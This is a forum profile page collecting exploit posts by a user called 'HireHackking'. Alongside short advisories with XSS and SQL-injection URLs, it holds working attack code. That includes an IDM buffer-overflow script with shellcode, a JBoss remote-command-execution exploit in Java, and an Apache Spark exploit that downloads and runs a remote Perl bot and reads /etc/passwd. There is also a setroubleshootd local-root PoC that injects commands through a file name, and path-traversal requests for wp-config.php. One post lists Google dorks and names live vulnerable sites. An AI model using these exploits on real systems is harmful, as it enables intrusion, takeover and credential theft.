
HireHackking


Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
  2. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
  3. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
  4. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
  5. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
  6. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
  7. source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/room2.php?roomid=[SQLi]
  8. source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/galleryphoto.php?id=[SQLi]
  9. #!/usr/bin/env python
     #[+] Author: TUNISIAN CYBER
     #[+] Exploit Title: IDM v6.20 Local Buffer Overflow
     #[+] Date: 27-03-2015
     #[+] Type: Local Exploits
     #[+] Tested on: WinXp/Windows 7 Pro
     #[+] Vendor: http://www.internetdownloadmanager.com/
     #[+] Friendly Sites: sec4ever.com
     #[+] Twitter: @TCYB3R
     #[+] Poc: http://i.imgur.com/7et4xSh.png
     #[+] Create IDMLBOF.txt then open it, copy the content, then go to Options-VPN/Dial Up and paste it in the username field.

     from struct import pack

     file = "IDMLBOF.txt"
     junk = "\x41" * 2313
     eip = pack('<I', 0x7C9D30D7)
     nops = "\x90" * 3
     shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
                  "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
                  "\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
                  "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
                  "\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
                  "\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
                  "\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
                  "\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")

     writeFile = open(file, "w")
     writeFile.write(junk + eip + nops + shellcode)
     writeFile.close()
  10. source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
  11. source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/gallery.php?photoid=1&id=[SQLi]
  12. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
      |-------------------------------------------------------------------------|
      | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability
      | [+] Exploit Author: Ashiyane Digital Security Team
      | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
      | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
      | [+] Tested on: Windows, Linux
      | [+] Date : 2015-03-28
      | [+] Discovered By : ACC3SS
      |-------------------------------------------------------------------------|
      | [+] Exploit:
      | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php
      | [+] Vulnerable Code :

      <?php
      $file = $_GET['file'];
      $file_arr = explode('/', $file);
      $file_name = $file_arr[count($file_arr) - 1];
      header("Content-type: octet/stream");
      header("Content-disposition: attachment; filename=" . $file_name . ";");
      header("Content-Length: " . filesize($file));
      readfile($file);
      exit;
      ?>

      | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
      | [+]
      | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
      |-------------------------------------------------------------------------|
      |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  13. /*
       * JBoss JMXInvokerServlet Remote Command Execution
       * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
       *
       * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
       * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
       * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
       * and the "JMX Console" are protected or disabled.
       *
       * [FAQ]
       *
       * Q: Is my target vulnerable?
       * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
       *
       * Q: How to fix it?
       * A: Enable authentication in "jmx-invoker-service.xml"
       *
       * Q: Is this exploit version-dependent?
       * A: Unfortunately, yes. A hash value is used to properly invoke a method.
       *    At least comparing version 4.x and 5.x, these hashes are different.
       *
       * Q: How to compile and launch it?
       * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
       *    java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
       *    Yes, it's a Java exploit. I can already see some of you complaining....
       */
      import java.io.BufferedReader;
      import java.io.IOException;
      import java.io.InputStream;
      import java.io.InputStreamReader;
      import java.io.ObjectOutputStream;
      import java.lang.reflect.Array;
      import java.lang.reflect.Field;
      import java.lang.reflect.Method;
      import java.net.ConnectException;
      import java.net.HttpURLConnection;
      import java.net.URL;
      import javax.management.MalformedObjectNameException;
      import javax.management.ObjectName;
      import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

      public class JMXInvokerServlet {

          //---------> CHANGE ME <---------
          static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1
          static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
          static final String cmd = "touch /tmp/exectest";
          //-------------------------------

          public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

              System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

              //Create a malicious Java serialized object
              MarshalledInvocation payload = new MarshalledInvocation();
              payload.setObjectName(new Integer(hash));

              //Executes the MBean invoke operation
              Class<?> c = Class.forName("javax.management.MBeanServerConnection");
              Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
              payload.setMethod(method);

              //Define MBean's name, operation and pars
              Object myObj[] = new Object[4];
              //MBean object name
              myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
              //Operation name
              myObj[1] = new String("createScriptDeployment");
              //Actual parameters
              myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
              //Operation signature
              myObj[3] = new String[]{"java.lang.String", "java.lang.String"};
              payload.setArguments(myObj);

              System.out.println("\n--[*] MarshalledInvocation object created");

              //For debugging - visualize the raw object
              //System.out.println(dump(payload));

              //Serialize the object
              try {
                  //Send the payload
                  URL server = new URL(url);
                  HttpURLConnection conn = (HttpURLConnection) server.openConnection();
                  conn.setRequestMethod("POST");
                  conn.setDoOutput(true);
                  conn.setDoInput(true);
                  conn.setUseCaches(false);
                  conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
                  conn.setRequestProperty("Connection", "keep-alive");
                  conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
                  conn.setRequestProperty("Content-Type", "application/octet-stream");
                  conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
                  conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");
                  ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
                  wr.writeObject(payload);
                  System.out.println("\n--[*] MarshalledInvocation object serialized");
                  System.out.println("\n--[*] Sending payload...");
                  wr.flush();
                  wr.close();

                  //Get the response
                  InputStream is = conn.getInputStream();
                  BufferedReader rd = new BufferedReader(new InputStreamReader(is));
                  String line;
                  StringBuffer response = new StringBuffer();
                  while ((line = rd.readLine()) != null) {
                      response.append(line);
                  }
                  rd.close();
                  if (response.indexOf("Script Name") != -1) {
                      System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
                  } else {
                      System.out.println("\n--[!] An invocation error occurred...");
                  }
              } catch (ConnectException cex) {
                  System.out.println("\n--[!] A connection error occurred...");
              } catch (IOException ex) {
                  ex.printStackTrace();
              }
          }

          /*
           * Raw dump of generic Java Objects
           */
          static String dump(Object o) {
              StringBuffer buffer = new StringBuffer();
              Class oClass = o.getClass();
              if (oClass.isArray()) {
                  buffer.append("[");
                  for (int i = 0; i < Array.getLength(o); i++) {
                      if (i > 0) {
                          buffer.append(",\n");
                      }
                      Object value = Array.get(o, i);
                      buffer.append(value.getClass().isArray() ? dump(value) : value);
                  }
                  buffer.append("]");
              } else {
                  buffer.append("{");
                  while (oClass != null) {
                      Field[] fields = oClass.getDeclaredFields();
                      for (int i = 0; i < fields.length; i++) {
                          if (buffer.length() > 1) {
                              buffer.append(",\n");
                          }
                          fields[i].setAccessible(true);
                          buffer.append(fields[i].getName());
                          buffer.append("=");
                          try {
                              Object value = fields[i].get(o);
                              if (value != null) {
                                  buffer.append(value.getClass().isArray() ? dump(value) : value);
                              }
                          } catch (IllegalAccessException e) {
                          }
                      }
                      oClass = oClass.getSuperclass();
                  }
                  buffer.append("}");
              }
              return buffer.toString();
          }
      }
  14. source: https://www.securityfocus.com/bid/51422/info BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. BoltWire 3.4.16 is vulnerable; other versions may also be affected. http://www.example.com/bolt/field/index.php?p=main&help=&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/bolt/field/index.php?"</a><script>alert(document.cookie)</script></ http://www.example.com/bolt/field/index.php?p=main&action=&#039;"</a><script>alert(document.cookie)</script></&file=file.jpg
  15. # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
      # Exploit Author : Claudio Viviani
      # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
      # Software Link : Premium plugin
      # Dork Google: revslider.php "index of"
      # Date : 2014-07-24
      # Tested on : Windows 7 / Mozilla Firefox
      #             Linux / Mozilla Firefox

      ######################

      # Description

      Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability

      ######################

      # PoC

      http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

      #####################

      Discovered By : Claudio Viviani
      http://www.homelab.it
      info@homelab.it
      homelabit@protonmail.ch
      https://www.facebook.com/homelabit
      https://twitter.com/homelabit
      https://plus.google.com/+HomelabIt1/
      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

      #####################
  16. ######################################################################
      # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
      # Google Dork: inurl:option=com_gallery_wd
      # Date: 29.03.2015
      # Exploit Author: CrashBandicot (@DosPerl)
      # Vendor HomePage: http://web-dorado.com/
      # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
      # Tested on: Windows
      ######################################################################

      parameter 'theme_id' in GET vulnerable

      # Example :
      # Parameter: theme_id (GET)
      # Type: error-based
      # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

      # ====================================================================================

      # parameter 'image_id' in POST vulnerable

      # Example :
      # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
      # Parameter: image_id (POST)
      # Type: error-based
      # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search

      # ~ Demo ~
      # $> http://www.cnct.tg/
      #    http://www.nswiop.nsw.edu.au/
      #    http://cnmect.licee.edu.ro/

      #EOF
  17. source: https://www.securityfocus.com/bid/51423/info ATutor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ATutor 2.0.3 is vulnerable; other versions may also be affected. http://www.example.com/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script> http://www.example.com/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php
  18. [+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
      [+]Author: TUNISIAN CYBER
      [+]Date: 29/03/2015
      [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
      [+]Type: WebApp
      [+]Risk: High
      [+]Overview: Contact Form Maker v1.0.1 suffers from an SQL injection vulnerability.
      [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
  19. # Exploit Title: Arbitrary Code Execution in Apache Spark Cluster
      # Date: 23/03/2015
      # Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in
      # Vendor Homepage: https://spark.apache.org/
      # Software Link: https://spark.apache.org/downloads.html
      # Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
      # Tested on: 1.2.1
      # Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for reviewing.
      # Reference(s) : http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
      # Exploit URL : https://github.com/akhld/spark-exploit/

      # Spark clusters which are not secured with a proper firewall can be taken over easily (since they do not have
      # any authentication mechanism); this exploit simply runs arbitrary code over the cluster.
      # All you have to do is find a vulnerable Spark cluster (usually runs on port 7077), add that host to your
      # hosts list so that your system will recognize it (here it's spark-b-akhil-master pointing
      # to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with the arbitrary code that you want to execute.

      # Language: Scala

      import org.apache.spark.{SparkContext, SparkConf}
      import scala.sys.process._ // needed for the ".!" string-to-process syntax used below

      /**
       * Created by akhld on 23/3/15.
       */
      object Exploit {
        def main(arg: Array[String]) {
          val sconf = new SparkConf()
            .setMaster("spark://spark-b-akhil-master:7077") // Set this to the vulnerable host URI
            .setAppName("Exploit")
            .set("spark.cores.max", "2")
            .set("spark.executor.memory", "2g")
            .set("spark.driver.host", "hacked.work") // Set this to your host from where you launch the attack

          val sc = new SparkContext(sconf)
          sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")

          val exploit = sc.parallelize(1 to 1).map(x => {
            // Replace these with whatever you want to get executed
            val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
            val y = "perl bot.pl".!
            scala.io.Source.fromFile("/etc/passwd").mkString
          })

          exploit.collect().foreach(println)
        }
      }

      Thanks
      Best Regards
  20. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin about which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py (lines 266-278) we have:

      def get_rpm_nvr_by_file_path_temporary(name):
          if name is None or not os.path.exists(name):
              return None

          nvr = None
          try:
              import commands
              rc, output = commands.getstatusoutput("rpm -qf '%s'" % name)
              if rc == 0:
                  nvr = output
          except:
              syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name)
          return nvr

      (and other similar occurrences)

      So. Yes, that's correct: The SELinux system that is only there to protect you passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Let that sink in...

      I attached a PoC which uses networkmanager's openvpn plugin to execute arbitrary commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when it's shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc).

      Sebastian

      PS: I am all for SELinux but there's something going the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than what's framed around it in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has less code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and the interpreter that can have bugs of their own.
      Driving such a lane _can only lead to the abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within.

      PPS: bug-logo will follow :)

      --
      ~ perl self.pl
      ~ $_='print"\$_=\47$_\47;eval"';eval
      ~ krahmer () suse de - SuSE Security Team

      #!/usr/bin/perl
      #
      # Fedora21 setroubleshootd local root PoC
      #
      # (C) 2015 Sebastian Krahmer
      #
      # - requires polkit authorization to add/mod VPN connections
      #   to NetworkManager (default on desktop user)
      # - after execution of this script, which adds appropriate
      #   NM connection entries, try
      #
      #   $ nmcli c up vpn-FOOBAR
      #
      #   a couple of times, until you see:
      #
      #   logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:...
      #
      #   in the journalctl logs
      #
      # PS: I know in advance what the SELinux developers will say... :p
      #
      # I say: lulz!

      # create a pathname that setroubleshootd will eventually
      # query sh -c { rpm -qf ... with, fucking up ' escaping. So the
      # embedded pathname is then evaluated as command
      #
      # There goes your NSA-grade SELinux security!!!
      $file = "/tmp/foo.pem';`id|logger`;echo '";
      open(O, ">", $file) or die $!;
      close O;

      # add connection
      system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn");
      open(O, "|nmcli c edit vpn-FOOBAR") or die $!;
      print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n";
      print O "set vpn.secrets password=1\nsave\nquit\n";
      close(O);
      print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n";
  21. source: https://www.securityfocus.com/bid/51424/info Beehive Forum 101 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/forum/register.php?'[xss] http://www.example.com/forum/register.php/''[xss] http://www.example.com/forum/logon.php?'"'[xss] http://www.example.com/forum/logon.php/'"'[xss]
  22. source: https://www.securityfocus.com/bid/51428/info phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. http://www.example.com/phpvideopro-0.9.7/help/index.php?topic=&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"
  23. source: https://www.securityfocus.com/bid/51431/info Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Giveaway Manager 3 is vulnerable; other versions may also be affected. http://www.example.com/members.php?id=[XSS]
  24. source: https://www.securityfocus.com/bid/51434/info Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]
  25. source: https://www.securityfocus.com/bid/51444/info Rockwell Automation FactoryTalk Activation Server is prone to multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to crash the affected application, denying service to legitimate users. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36570.zip